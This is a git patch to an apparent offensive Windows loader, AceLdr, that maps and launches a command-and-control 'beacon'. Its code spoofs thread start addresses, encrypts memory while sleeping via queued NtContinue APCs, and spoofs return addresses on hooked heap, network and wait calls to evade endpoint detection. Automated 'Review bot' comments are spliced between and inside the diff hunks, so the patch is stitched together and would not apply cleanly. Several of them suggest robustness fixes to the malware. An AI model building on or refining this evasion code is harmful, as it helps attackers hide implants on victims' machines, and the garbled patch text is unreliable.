From 6ab821a01a4da8bc03c041a6f1c4e2678758db13 Mon Sep 17 00:00:00 2001
From: Kyle Avery <9327972+kyleavery@users.noreply.github.com>
Date: Thu, 28 Sep 2023 19:37:46 +0000
Subject: [PATCH] bug fixes
---
 Makefile | 11 +-
 src/ace.c | 34 ++--
 src/hooks/delay.c | 10 +-
 src/hooks/spoof.c | 6 +-
 src/include.h | 14 +-
 src/native.h | 473 +--------------------------------------------
 src/retaddr.c | 22 +-
 src/util.c | 10 +-
 8 files changed, 52 insertions(+), 528 deletions(-)
diff --git a/Makefile b/Makefile
index 96bf792..90be88e 100644
--- a/Makefile
+++ b/Makefile
@@ -4,18 +4,19 @@ OUT := bin
CFLAGS := $(CFLAGS) -Os -fno-asynchronous-unwind-tables -nostdlib
CFLAGS := $(CFLAGS) -fno-ident -fpack-struct=8 -falign-functions=1
-CFLAGS := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -w
-CFLAGS := $(CFLAGS) -falign-labels=1 -fPIC -Wl,-Tsrc/link.ld
+CFLAGS := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -Wall
+CFLAGS := $(CFLAGS) -Werror -falign-labels=1 -fPIC -Wno-array-bounds
LFLAGS := $(LFLAGS) -Wl,-s,--no-seh,--enable-stdcall-fixup
+LFLAGS := $(LFLAGS) -Wl,--image-base=0,-Tsrc/link.ld
default: clean aceldr
release: default zip
aceldr:
- @ nasm -f win64 src/asm/start.asm -o $(OUT)/start.tmp.o
- @ nasm -f win64 src/asm/misc.asm -o $(OUT)/misc.tmp.o
- @ nasm -f win64 src/asm/spoof.asm -o $(OUT)/spoof.tmp.o
+ @ nasm -Werror=all -f win64 src/asm/start.asm -o $(OUT)/start.tmp.o
+ @ nasm -Werror=all -f win64 src/asm/misc.asm -o $(OUT)/misc.tmp.o
+ @ nasm -Werror=all -f win64 src/asm/spoof.asm -o $(OUT)/spoof.tmp.o
@ $(CC_X64) src/*.c $(OUT)/start.tmp.o $(OUT)/misc.tmp.o $(OUT)/spoof.tmp.o src/hooks/*.c -o $(OUT)/$(NAME).x64.exe $(CFLAGS) $(LFLAGS) -I.
@ python3 scripts/extract.py -f $(OUT)/$(NAME).x64.exe -o $(OUT)/$(NAME).x64.bin
@ rm $(OUT)/*.tmp.o 2>/dev/null || true
diff --git a/src/ace.c b/src/ace.c
index 3adf7b2..205a359 100644
--- a/src/ace.c
+++ b/src/ace.c
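Review bot: `-Wno-array-bounds` on the new CFLAGS line switches the whole warning class off for every translation unit, so a genuine out-of-bounds read anywhere in src/*.c or src/hooks/*.c now builds cleanly under the `-Wall -Werror` this same hunk introduces. Presumably the position-independent pointer arithmetic through OFFSET()/G_END() is what trips the analyser, but the Makefile does not say so; a comment above the flag, `# -Wno-array-bounds: GCC flags the OFFSET()-relative pointer math as out-of-bounds; review new array indexing by hand`, keeps the reason next to the suppression. If only a few sites trigger it, a local `#pragma GCC diagnostic ignored "-Warray-bounds"` around them is preferable to the global switch.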
@@ -38,7 +38,7 @@ typedef struct
} REG, *PREG;
#ifndef PTR_TO_HOOK
-#define PTR_TO_HOOK( a, b ) U_PTR( U_PTR( a ) + OFFSET( b ) - OFFSET( Stub ) )
+#define PTR_TO_HOOK( a, b ) C_PTR( U_PTR( a ) + OFFSET( b ) - OFFSET( Stub ) )
#endif
#ifndef memcpy
@@ -72,19 +72,18 @@ SECTION( B ) NTSTATUS resolveLoaderFunctions( PAPI pApi )
return STATUS_SUCCESS;
};
-SECTION( B ) REG calculateRegions( VOID )
+SECTION( B ) VOID calculateRegions( PREG pReg )
{
- REG Reg = { 0 };
SIZE_T ILn = 0;
- Reg.Dos = C_PTR( G_END() );
- Reg.NT = C_PTR( U_PTR( Reg.Dos ) + Reg.Dos->e_lfanew );
+ pReg->Dos = C_PTR( G_END() );
+ pReg->NT = C_PTR( U_PTR( pReg->Dos ) + pReg->Dos->e_lfanew );
- ILn = ( ( ( Reg.NT->OptionalHeader.SizeOfImage ) + 0x1000 - 1 ) &~( 0x1000 - 1 ) );
- Reg.Exec = ( ( ( G_END() - OFFSET( Stub ) ) + 0x1000 - 1 ) &~ ( 0x1000 - 1 ) );
- Reg.Full = ILn + Reg.Exec;
-
- return Reg;
+ ILn = ( ( ( pReg->NT->OptionalHeader.SizeOfImage ) + 0x1000 - 1 ) &~( 0x1000 - 1 ) );
+ pReg->Exec = ( ( ( G_END() - OFFSET( Stub ) ) + 0x1000 - 1 ) &~ ( 0x1000 - 1 ) );
+ pReg->Full = ILn + pReg->Exec;
+
+ return;
};
SECTION( B ) VOID copyStub( PVOID buffer )
@@ -137,7 +136,7 @@ SECTION( B ) VOID installHooks( PVOID map, PVOID buffer, PIMAGE_NT_HEADERS nt )
if( Dir->VirtualAddress )
{
- LdrProcessRel( C_PTR( map ), C_PTR( U_PTR( map ) + Dir->VirtualAddress ), nt->OptionalHeader.ImageBase );
+ LdrProcessRel( C_PTR( map ), C_PTR( U_PTR( map ) + Dir->VirtualAddress ), C_PTR( nt->OptionalHeader.ImageBase ) );
};
};
@@ -153,8 +152,8 @@ SECTION( B ) VOID fillStub( PVOID buffer, HANDLE heap, SIZE_T region )
SECTION( B ) VOID executeBeacon( PVOID entry )
{
DLLMAIN_T Ent = entry;
- Ent( OFFSET( Start ), 1, NULL );
- Ent( OFFSET( Start ), 4, NULL );
+ Ent( ( HMODULE )OFFSET( Start ), 1, NULL );
+ Ent( ( HMODULE )OFFSET( Start ), 4, NULL );
};
SECTION( B ) VOID Loader( VOID )
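Review bot: The new `calculateRegions( PREG pReg )` dereferences `pReg->Dos->e_lfanew` and then `pReg->NT->OptionalHeader.SizeOfImage` immediately, with no check that `pReg` is non-NULL or that the bytes at `G_END()` carry the `IMAGE_DOS_SIGNATURE`/`IMAGE_NT_SIGNATURE` values the casts assume, so a truncated or mis-linked payload becomes an out-of-bounds read rather than a clean failure. The page-rounding expression `( x + 0x1000 - 1 ) &~ ( 0x1000 - 1 )` appears three times with a bare `0x1000`; a named helper such as `#define PAGE_ALIGN( x ) ( ( U_PTR( x ) + 0x1000 - 1 ) & ~( 0x1000 - 1 ) )` would state the intent once, and the trailing `return;` in a VOID function is redundant. Because the function now reports nothing, its caller in `Loader` (hunk @@ -172) cannot learn that the regions are unusable; returning an NTSTATUS or BOOL would let it skip the allocation.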
@@ -172,7 +171,7 @@ SECTION( B ) VOID Loader( VOID )
if( resolveLoaderFunctions( &Api ) == STATUS_SUCCESS )
{
- Reg = calculateRegions();
+ calculateRegions( &Reg );
Status = Api.ntdll.NtAllocateVirtualMemory( ( HANDLE )-1, &MemoryBuffer, 0, &Reg.Full, MEM_COMMIT, PAGE_READWRITE );
if( Status == STATUS_SUCCESS )
{
@@ -226,16 +225,15 @@ SECTION( B ) NTSTATUS resolveAceFunctions( PAPI pApi )
SECTION( B ) NTSTATUS createBeaconThread( PAPI pApi, PHANDLE thread )
{
BOOL Suspended = TRUE;
- LPTHREAD_START_ROUTINE StartAddress = pApi->ntdll.RtlUserThreadStart + 0x21;
+ PVOID StartAddress = C_PTR( pApi->ntdll.RtlUserThreadStart + 0x21 );
- return pApi->ntdll.RtlCreateUserThread( ( HANDLE )-1, NULL, Suspended, 0, 0, 0, StartAddress, NULL, thread, NULL );
+ return pApi->ntdll.RtlCreateUserThread( ( HANDLE )-1, NULL, Suspended, 0, 0, 0, ( PUSER_THREAD_START_ROUTINE )StartAddress, NULL, thread, NULL );
};
SECTION( B ) VOID Ace( VOID )
{
API Api;
CONTEXT Ctx;
- NTSTATUS Status;
HANDLE Thread;
RtlSecureZeroMemory( &Api, sizeof( Api ) );
@@ -247,7 +245,7 @@ SECTION( B ) VOID Ace( VOID )
{
Ctx.ContextFlags = CONTEXT_CONTROL;
Api.ntdll.NtGetContextThread( Thread, &Ctx );
- Ctx.Rip = C_PTR( Loader );
+ Ctx.Rip = ( DWORD64 )C_PTR( Loader );
Api.ntdll.NtSetContextThread( Thread, &Ctx );
Api.ntdll.NtResumeThread( Thread, NULL );
diff --git a/src/hooks/delay.c b/src/hooks/delay.c
index 3778414..1215996 100644
--- a/src/hooks/delay.c
+++ b/src/hooks/delay.c
@@ -131,7 +131,7 @@ SECTION( D ) NTSTATUS queueAPCs( PAPI pApi, PCONTEXT* contexts, HANDLE hThread )
NTSTATUS Status;
for( int i = 9; i >= 0; i-- )
{
- Status = pApi->ntdll.NtQueueApcThread( hThread, pApi->ntdll.NtContinue, contexts[i], NULL, NULL );
+ Status = pApi->ntdll.NtQueueApcThread( hThread, C_PTR( pApi->ntdll.NtContinue ), contexts[i], NULL, NULL );
if( Status != STATUS_SUCCESS )
{
break;
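Review bot: `C_PTR( pApi->ntdll.RtlUserThreadStart + 0x21 )` in `createBeaconThread` bakes a byte offset into the body of an ntdll routine into the loader; the value is tied to one specific ntdll build and nothing in the hunk checks what lies at that address before it is handed to `RtlCreateUserThread`, so on another build the new thread begins at an arbitrary instruction boundary. The constant at least deserves a name and a comment recording where it came from, e.g. `#define RTL_USER_THREAD_START_OFFSET 0x21 /* byte offset into RtlUserThreadStart; taken from ntdll build <PLACEHOLDER> */`. If `RtlUserThreadStart` is a function-pointer member, `+ 0x21` on it is also a GNU extension; `C_PTR( U_PTR( pApi->ntdll.RtlUserThreadStart ) + RTL_USER_THREAD_START_OFFSET )` makes the byte arithmetic explicit and portable. Removing the unused `NTSTATUS Status` from `Ace` is a good cleanup.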
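Review bot: The loop bound in `for( int i = 9; i >= 0; i-- )` of `queueAPCs` is a bare literal that must agree with the `i = 13` bound and the `i < 10` / `contexts[11]` indices in `initContexts` (hunk @@ -147 of src/hooks/delay.c); the new `C_PTR( pApi->ntdll.NtContinue )` line does nothing to tie them together, so editing one silently breaks the other. A pair of shared constants, `#define CTX_COUNT 14` and `#define CTX_QUEUED 10`, used in both loops would document the relationship. Each queued APC keeps a pointer to `contexts[i]` after this function returns, and nothing visible says who frees those CONTEXT blocks; a comment on `queueAPCs` naming the owner would help. The function's return lies outside the hunk.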
@@ -147,7 +147,7 @@ SECTION( D ) VOID initContexts( PAPI pApi, PCONTEXT* contexts )
for( int i = 13; i >= 0; i-- )
{
- contexts[i] = ( PCONTEXT )SPOOF( pApi->ntdll.RtlAllocateHeap, pApi->hNtdll, pApi->szNtdll, hProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
+ contexts[i] = ( PCONTEXT )C_PTR( SPOOF( pApi->ntdll.RtlAllocateHeap, pApi->hNtdll, pApi->szNtdll, hProcessHeap, C_PTR( HEAP_ZERO_MEMORY ), C_PTR( sizeof( CONTEXT ) ) ) );
if( i < 10 )
{
*contexts[i] = *contexts[11];
@@ -233,7 +233,7 @@ SECTION( D ) VOID delayExec( PAPI pApi )
{
#define CHECKERR( status ) if( status != STATUS_SUCCESS ) { goto cleanup; };
- NTSTATUS Status = NULL;
+ NTSTATUS Status = 0;
HANDLE SyncEvt = NULL;
HANDLE WaitThd = NULL;
HANDLE OrigThd = NULL;
@@ -447,7 +447,7 @@ SECTION( D ) NTSTATUS resolveSleepHookFunctions( PAPI pApi )
};
pApi->ntdll.RtlInitAnsiString( &Str, C_PTR( OFFSET( "SystemFunction032" ) ) );
- pApi->ntdll.LdrGetProcedureAddress( pApi->hAdvapi, &Str, 0, &pApi->advapi.SystemFunction032 );
+ pApi->ntdll.LdrGetProcedureAddress( pApi->hAdvapi, &Str, 0, ( PVOID* )&pApi->advapi.SystemFunction032 );
RtlSecureZeroMemory( &Uni, sizeof( Uni ) );
RtlSecureZeroMemory( &Str, sizeof( Str ) );
@@ -470,7 +470,7 @@ SECTION( D ) VOID Sleep_Hook( DWORD dwMilliseconds )
API Api;
RtlSecureZeroMemory( &Api, sizeof( Api ) );
- Api.CFG = NULL;
+ Api.CFG = 0;
Api.dwMilliseconds = dwMilliseconds;
Api.Buffer = C_PTR( ( ( PSTUB ) OFFSET( Stub ) )->Region );
Api.Length = U_PTR( ( ( PSTUB ) OFFSET( Stub ) )->Size );
diff --git a/src/hooks/spoof.c b/src/hooks/spoof.c
index 62113b7..79734d1 100644
--- a/src/hooks/spoof.c
+++ b/src/hooks/spoof.c
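Review bot: The new allocation line in `initContexts` stores the `RtlAllocateHeap` result in `contexts[i]` without a NULL check, and for `i < 10` the next statement dereferences it (`*contexts[i] = *contexts[11]`) while `contexts[11]` was never checked either, so an allocation failure becomes a NULL write inside the hook. `initContexts` is VOID and cannot report the failure; the least-invasive fix is to stop and leave the remaining entries NULL, `if( contexts[i] == NULL ) { break; }` directly after the assignment, with the caller checking the array before `queueAPCs` consumes it. The cast chain `( PCONTEXT )C_PTR( SPOOF( ... C_PTR( HEAP_ZERO_MEMORY ), C_PTR( sizeof( CONTEXT ) ) ) )` exists only because `Spoof` takes PVOID-only arguments; a small typed wrapper around this allocation would make the line readable.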
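Review bot: The `LdrGetProcedureAddress( pApi->hAdvapi, &Str, 0, ( PVOID* )&pApi->advapi.SystemFunction032 )` call in `resolveSleepHookFunctions` discards its NTSTATUS, so if the export is missing `pApi->advapi.SystemFunction032` stays at the zero `RtlSecureZeroMemory` left there and the later call through it faults. The function already returns NTSTATUS, so propagate it: `Status = pApi->ntdll.LdrGetProcedureAddress( ... );` followed by `if( Status != STATUS_SUCCESS ) { return Status; }` (declaring `Status` if the function has no such local), or, if the lookup is meant to be best-effort, say so in a comment. The resolution of `pApi->hAdvapi` itself is outside this hunk and presumably checked there.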
@@ -31,7 +31,7 @@ SECTION( D ) PVOID RtlAllocateHeap_Hook( PVOID heapHandle, ULONG flags, SIZE_T s
Api.ntdll.RtlAllocateHeap = FindFunction( hNtdll, H_API_RTLALLOCATEHEAP );
- return SPOOF( Api.ntdll.RtlAllocateHeap, hNtdll, Size, heapHandle, flags, size );
+ return SPOOF( Api.ntdll.RtlAllocateHeap, hNtdll, Size, heapHandle, C_PTR( U_PTR( flags ) ), C_PTR( U_PTR ( size ) ) );
};
SECTION( D ) LPVOID HeapAlloc_Hook( HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes )
@@ -53,7 +53,7 @@ SECTION( D ) HINTERNET InternetConnectA_Hook( HINTERNET hInternet, LPCSTR lpszSe
Api.net.InternetConnectA = FindFunction( hNet, H_API_INTERNETCONNECTA );
- return SPOOF( Api.net.InternetConnectA, hNet, Size, hInternet, lpszServerName, nServerPort, lpszUserName, lpszPassword, dwService, dwFlags, dwContext );
+ return ( HINTERNET )SPOOF( Api.net.InternetConnectA, hNet, Size, hInternet, C_PTR( lpszServerName ), C_PTR( U_PTR( nServerPort ) ), C_PTR( lpszUserName ), C_PTR( lpszPassword ), C_PTR( U_PTR ( dwService ) ), C_PTR( U_PTR( dwFlags ) ), C_PTR( U_PTR( dwContext ) ) );
};
SECTION( D ) NTSTATUS NtWaitForSingleObject_Hook( HANDLE handle, BOOLEAN alertable, PLARGE_INTEGER timeout )
@@ -70,5 +70,5 @@ SECTION( D ) NTSTATUS NtWaitForSingleObject_Hook( HANDLE handle, BOOLEAN alertab
Api.ntdll.NtWaitForSingleObject = FindFunction( hNtdll, H_API_NTWAITFORSINGLEOBJECT );
- return SPOOF( Api.ntdll.NtWaitForSingleObject, hNtdll, Size, handle, alertable, timeout );
+ return ( NTSTATUS )U_PTR( SPOOF( Api.ntdll.NtWaitForSingleObject, hNtdll, Size, handle, C_PTR( U_PTR( alertable ) ), timeout ) );
};
diff --git a/src/include.h b/src/include.h
index 990c806..c2110d4 100644
--- a/src/include.h
+++ b/src/include.h
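Review bot: `( NTSTATUS )U_PTR( SPOOF( ... ) )` in `NtWaitForSingleObject_Hook` narrows the 64-bit value returned through the PVOID-typed `Spoof` to a 32-bit NTSTATUS; that is only correct because the callee's status comes back in the low half of RAX, and nothing on the line says so. The same PVOID funnel is why `InternetConnectA_Hook` (hunk @@ -53) now wraps `lpszServerName`, `lpszUserName` and `lpszPassword` in `C_PTR()`, silently discarding their `const`. A comment on the return, `// Spoof returns RAX as PVOID; the NTSTATUS is its low 32 bits`, and explicit `C_PTR( ( LPSTR )lpszServerName )`-style casts would make both conversions deliberate rather than incidental.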
@@ -41,10 +41,16 @@ typedef struct __attribute__(( packed ))
HANDLE Heap;
} STUB, *PSTUB ;
-static ULONG_PTR Start( VOID );
-static ULONG_PTR GetIp( VOID );
-static ULONG_PTR Stub( VOID );
-static ULONG_PTR Spoof( VOID );
+typedef struct {
+ const void* trampoline; // always JMP RBX
+ void* function; // Target Function
+ void* rbx; // Placeholder
+} PRM, *PPRM;
+
+extern ULONG_PTR Start( VOID );
+extern ULONG_PTR GetIp( VOID );
+extern ULONG_PTR Stub( VOID );
+extern PVOID Spoof( PVOID, PVOID, PVOID, PVOID, PPRM, PVOID, PVOID, PVOID, PVOID, PVOID );
#include "util.h"
diff --git a/src/native.h b/src/native.h
index f18b160..d74ce7f 100644
--- a/src/native.h
+++ b/src/native.h
@@ -1,10 +1,6 @@
#if !defined(_NTDLL_)
#define _NTDLL_
-#pragma warning( disable:4001 )
-#pragma warning( disable:4201 )
-#pragma warning( disable:4214 )
-
#if defined(__ICL)
#pragma warning ( disable : 344 )
#endif
@@ -9680,21 +9676,8 @@ typedef enum _TABLE_SEARCH_RESULT
TableInsertAsRight
} TABLE_SEARCH_RESULT;
-typedef enum _RTL_GENERIC_COMPARE_RESULTS
-{
- GenericLessThan,
- GenericGreaterThan,
- GenericEqual
-} RTL_GENERIC_COMPARE_RESULTS;
-
struct _RTL_AVL_TABLE;
-typedef RTL_GENERIC_COMPARE_RESULTS (NTAPI *PRTL_AVL_COMPARE_ROUTINE)(
- IN struct _RTL_AVL_TABLE *Table,
- IN PVOID FirstStruct,
- IN PVOID SecondStruct
- );
-
typedef PVOID (NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(
IN struct _RTL_AVL_TABLE *Table,
IN CLONG ByteSize
@@ -9711,14 +9694,6 @@ typedef NTSTATUS (NTAPI *PRTL_AVL_MATCH_FUNCTION)(
IN PVOID MatchData
);
-typedef
- RTL_GENERIC_COMPARE_RESULTS
- (NTAPI *PRTL_AVL_COMPARE_ROUTINE) (
- struct _RTL_AVL_TABLE *Table,
- PVOID FirstStruct,
- PVOID SecondStruct
- );
-
typedef
PVOID
(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE) (
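Review bot: The new `extern PVOID Spoof( PVOID, PVOID, PVOID, PVOID, PPRM, PVOID, PVOID, PVOID, PVOID, PVOID );` prototype has no parameter names and no comment, yet its fifth slot is the `PPRM` descriptor and its sixth is always `NULL` at the one visible call site (`SpoofRetAddr` in src/retaddr.c passes `a, b, c, d, &param, NULL, e, f, g, h`), so a reader of this header cannot tell what the ten slots mean. Because the symbol is implemented in assembly, this C prototype is the only contract there is: name the parameters and put a short comment above it describing the slot layout (four leading arguments, the PPRM, one reserved slot, four trailing arguments) to the extent the asm guarantees it. The `PRM` field comments (`// always JMP RBX`, `// Placeholder`) are moved verbatim from retaddr.c; `rbx` in particular deserves a sentence on who fills it in and when.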
@@ -9735,28 +9710,6 @@ typedef
PVOID MatchData
);
-typedef
- RTL_GENERIC_COMPARE_RESULTS
- (NTAPI *PRTL_GENERIC_COMPARE_ROUTINE) (
- struct _RTL_GENERIC_TABLE *Table,
- PVOID FirstStruct,
- PVOID SecondStruct
- );
-
-typedef
- PVOID
- (NTAPI *PRTL_GENERIC_ALLOCATE_ROUTINE) (
- struct _RTL_GENERIC_TABLE *Table,
- ULONG ByteSize
- );
-
-typedef
- VOID
- (NTAPI *PRTL_GENERIC_FREE_ROUTINE) (
- struct _RTL_GENERIC_TABLE *Table,
- PVOID Buffer
- );
-
typedef struct _RTL_BALANCED_LINKS
{
struct _RTL_BALANCED_LINKS *Parent;
@@ -9766,34 +9719,6 @@ typedef struct _RTL_BALANCED_LINKS
UCHAR Reserved[3];
} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;
-typedef struct _RTL_AVL_TABLE
-{
- RTL_BALANCED_LINKS BalancedRoot;
- PVOID OrderedPointer;
- ULONG WhichOrderedElement;
- ULONG NumberGenericTableElements;
- ULONG DepthOfTree;
- PRTL_BALANCED_LINKS RestartKey;
- ULONG DeleteCount;
- PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
- PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
- PRTL_AVL_FREE_ROUTINE FreeRoutine;
- PVOID TableContext;
-} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
-
-typedef struct _RTL_GENERIC_TABLE {
- PRTL_SPLAY_LINKS TableRoot;
- LIST_ENTRY InsertOrderList;
- PLIST_ENTRY OrderedPointer;
- ULONG WhichOrderedElement;
- ULONG NumberGenericTableElements;
- PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine;
- PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine;
- PRTL_GENERIC_FREE_ROUTINE FreeRoutine;
- PVOID TableContext;
-} RTL_GENERIC_TABLE;
-typedef RTL_GENERIC_TABLE *PRTL_GENERIC_TABLE;
-
typedef struct _GENERATE_NAME_CONTEXT
{
USHORT Checksum;
@@ -10087,8 +10012,6 @@ typedef struct _KLDR_DATA_TABLE_ENTRY
#define RTL_HEAP_UNCOMMITTED_RANGE (USHORT)0x0100
#define RTL_HEAP_PROTECTED_ENTRY (USHORT)0x0200
-#pragma warning(disable: 4273)
-
typedef struct _DISPATCHER_HEADER
{
union
@@ -11331,24 +11254,11 @@ typedef struct _RTL_PATCH_HEADER
HOTPATCH_MODULE_ENTRY HotpatchModuleEntry;
} RTL_PATCH_HEADER, *PRTL_PATCH_HEADER;
-
-
-#pragma warning(default: 4273)
-
#ifndef _SLIST_HEADER_
#define _SLIST_HEADER_
#if defined(_M_X64)
-
-
-
-
-
-
-
-
-
#pragma warning(push)
#pragma warning(disable:4324)
typedef struct DECLSPEC_ALIGN(16) _SLIST_ENTRY *PSLIST_ENTRY;
@@ -11389,10 +11299,6 @@ typedef union _SLIST_HEADER {
#endif
-
-
-
-
PSLIST_ENTRY
__fastcall
RtlInterlockedPushListSList (
@@ -11411,104 +11317,6 @@ RtlAssert(
IN OPTIONAL PSTR MutableMessage
);
-VOID
-NTAPI
-RtlInitializeGenericTableAvl (
- PRTL_AVL_TABLE Table,
- PRTL_AVL_COMPARE_ROUTINE CompareRoutine,
- PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,
- PRTL_AVL_FREE_ROUTINE FreeRoutine,
- PVOID TableContext
- );
-
-PVOID
-NTAPI
-RtlInsertElementGenericTableAvl (
- PRTL_AVL_TABLE Table,
- PVOID Buffer,
- ULONG BufferSize,
- PBOOLEAN NewElement OPTIONAL
- );
-
-PVOID
-NTAPI
-RtlInsertElementGenericTableFullAvl (
- PRTL_AVL_TABLE Table,
- PVOID Buffer,
- ULONG BufferSize,
- PBOOLEAN NewElement OPTIONAL,
- PVOID NodeOrParent,
- TABLE_SEARCH_RESULT SearchResult
- );
-
-BOOLEAN
-NTAPI
-RtlDeleteElementGenericTableAvl (
- PRTL_AVL_TABLE Table,
- PVOID Buffer
- );
-
-PVOID
-NTAPI
-RtlLookupElementGenericTableAvl (
- PRTL_AVL_TABLE Table,
- PVOID Buffer
- );
-
-PVOID
-NTAPI
-RtlLookupElementGenericTableFullAvl (
- PRTL_AVL_TABLE Table,
- PVOID Buffer,
- OUT PVOID *NodeOrParent,
- OUT TABLE_SEARCH_RESULT *SearchResult
- );
-
-PVOID
-NTAPI
-RtlEnumerateGenericTableAvl (
- PRTL_AVL_TABLE Table,
- BOOLEAN Restart
- );
-
-PVOID
-NTAPI
-RtlEnumerateGenericTableWithoutSplayingAvl (
- PRTL_AVL_TABLE Table,
- PVOID *RestartKey
- );
-
-PVOID
-NTAPI
-RtlEnumerateGenericTableLikeADirectory (
- IN PRTL_AVL_TABLE Table,
- IN PRTL_AVL_MATCH_FUNCTION MatchFunction,
- IN PVOID MatchData,
- IN ULONG NextFlag,
- IN OUT PVOID *RestartKey,
- IN OUT PULONG DeleteCount,
- IN OUT PVOID Buffer
- );
-
-PVOID
-NTAPI
-RtlGetElementGenericTableAvl (
- PRTL_AVL_TABLE Table,
- ULONG I
- );
-
-ULONG
-NTAPI
-RtlNumberGenericTableElementsAvl (
- PRTL_AVL_TABLE Table
- );
-
-BOOLEAN
-NTAPI
-RtlIsGenericTableEmptyAvl (
- PRTL_AVL_TABLE Table
- );
-
PRTL_SPLAY_LINKS
NTAPI
RtlSplay (
@@ -11552,92 +11360,6 @@ RtlRealPredecessor (
PRTL_SPLAY_LINKS Links
);
-VOID
-NTAPI
-RtlInitializeGenericTable (
- PRTL_GENERIC_TABLE Table,
- PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine,
- PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine,
- PRTL_GENERIC_FREE_ROUTINE FreeRoutine,
- PVOID TableContext
- );
-
-PVOID
-NTAPI
-RtlInsertElementGenericTable (
- PRTL_GENERIC_TABLE Table,
- PVOID Buffer,
- ULONG BufferSize,
- PBOOLEAN NewElement OPTIONAL
- );
-
-PVOID
-NTAPI
-RtlInsertElementGenericTableFull (
- PRTL_GENERIC_TABLE Table,
- PVOID Buffer,
- ULONG BufferSize,
- PBOOLEAN NewElement OPTIONAL,
- PVOID NodeOrParent,
- TABLE_SEARCH_RESULT SearchResult
- );
-
-BOOLEAN
-NTAPI
-RtlDeleteElementGenericTable (
- PRTL_GENERIC_TABLE Table,
- PVOID Buffer
- );
-
-PVOID
-NTAPI
-RtlLookupElementGenericTable (
- PRTL_GENERIC_TABLE Table,
- PVOID Buffer
- );
-
-PVOID
-NTAPI
-RtlLookupElementGenericTableFull (
- PRTL_GENERIC_TABLE Table,
- PVOID Buffer,
- OUT PVOID *NodeOrParent,
- OUT TABLE_SEARCH_RESULT *SearchResult
- );
-
-PVOID
-NTAPI
-RtlEnumerateGenericTable (
- PRTL_GENERIC_TABLE Table,
- BOOLEAN Restart
- );
-
-PVOID
-NTAPI
-RtlEnumerateGenericTableWithoutSplaying (
- PRTL_GENERIC_TABLE Table,
- PVOID *RestartKey
- );
-
-PVOID
-NTAPI
-RtlGetElementGenericTable(
- PRTL_GENERIC_TABLE Table,
- ULONG I
- );
-
-ULONG
-NTAPI
-RtlNumberGenericTableElements(
- PRTL_GENERIC_TABLE Table
- );
-
-BOOLEAN
-NTAPI
-RtlIsGenericTableEmpty (
- PRTL_GENERIC_TABLE Table
- );
-
NTSTATUS
NTAPI
RtlInitializeHeapManager(
@@ -12163,13 +11885,6 @@ RtlIpv4AddressToStringA (
OUT PSTR S
);
-PSTR
-NTAPI
-RtlIpv6AddressToStringA (
- IN const struct in6_addr *Addr,
- OUT PSTR S
- );
-
NTSTATUS
NTAPI
RtlIpv4AddressToStringExA(
@@ -12179,16 +11894,6 @@ RtlIpv4AddressToStringExA(
IN OUT PULONG AddressStringLength
);
-NTSTATUS
-NTAPI
-RtlIpv6AddressToStringExA(
- IN const struct in6_addr *Address,
- IN ULONG ScopeId,
- IN USHORT Port,
- OUT PSTR AddressString,
- IN OUT PULONG AddressStringLength
- );
-
PWSTR
NTAPI
RtlIpv4AddressToStringW (
@@ -12196,13 +11901,6 @@ RtlIpv4AddressToStringW (
OUT PWSTR S
);
-PWSTR
-NTAPI
-RtlIpv6AddressToStringW (
- IN const struct in6_addr *Addr,
- OUT PWSTR S
- );
-
NTSTATUS
NTAPI
RtlIpv4AddressToStringExW(
@@ -12212,16 +11910,6 @@ RtlIpv4AddressToStringExW(
IN OUT PULONG AddressStringLength
);
-NTSTATUS
-NTAPI
-RtlIpv6AddressToStringExW(
- IN const struct in6_addr *Address,
- IN ULONG ScopeId,
- IN USHORT Port,
- OUT PWSTR AddressString,
- IN OUT PULONG AddressStringLength
- );
-
NTSTATUS
NTAPI
RtlIpv4StringToAddressA (
@@ -12231,14 +11919,6 @@ RtlIpv4StringToAddressA (
OUT struct in_addr *Addr
);
-NTSTATUS
-NTAPI
-RtlIpv6StringToAddressA (
- IN PCSTR S,
- OUT PCSTR *Terminator,
- OUT struct in6_addr *Addr
- );
-
NTSTATUS
NTAPI
RtlIpv4StringToAddressExA (
@@ -12248,15 +11928,6 @@ RtlIpv4StringToAddressExA (
OUT PUSHORT Port
);
-NTSTATUS
-NTAPI
-RtlIpv6StringToAddressExA (
- IN PCSTR AddressString,
- OUT struct in6_addr *Address,
- OUT PULONG ScopeId,
- OUT PUSHORT Port
- );
-
NTSTATUS
NTAPI
RtlIpv4StringToAddressW (
@@ -12266,14 +11937,6 @@ RtlIpv4StringToAddressW (
OUT struct in_addr *Addr
);
-NTSTATUS
-NTAPI
-RtlIpv6StringToAddressW (
- IN PCWSTR S,
- OUT PCWSTR *Terminator,
- OUT struct in6_addr *Addr
- );
-
NTSTATUS
NTAPI
RtlIpv4StringToAddressExW (
@@ -12283,15 +11946,6 @@ RtlIpv4StringToAddressExW (
OUT PUSHORT Port
);
-NTSTATUS
-NTAPI
-RtlIpv6StringToAddressExW (
- IN PCWSTR AddressString,
- OUT struct in6_addr *Address,
- OUT PULONG ScopeId,
- OUT PUSHORT Port
- );
-
NTSTATUS
NTAPI
RtlIntegerToUnicodeString (
@@ -16672,11 +16326,11 @@ NtSetLdtEntries (
NTSTATUS
NTAPI
NtQueueApcThread (
- IN HANDLE ThreadHandle,
- IN PIO_APC_ROUTINE ApcRoutine,
- IN OPTIONAL PVOID ApcRoutineContext,
- IN OPTIONAL PIO_STATUS_BLOCK ApcStatusBlock,
- IN OPTIONAL ULONG ApcReserved
+ IN HANDLE ThreadHandle,
+ IN PVOID ApcRoutine,
+ IN OPTIONAL PVOID ApcRoutineContext,
+ IN OPTIONAL PVOID ApcStatusBlock,
+ IN OPTIONAL PVOID ApcReserved
);
NTSTATUS
@@ -20585,71 +20239,6 @@ DebugService2 (
ULONG Service
);
-
-__inline
-LARGE_INTEGER
-NTAPI
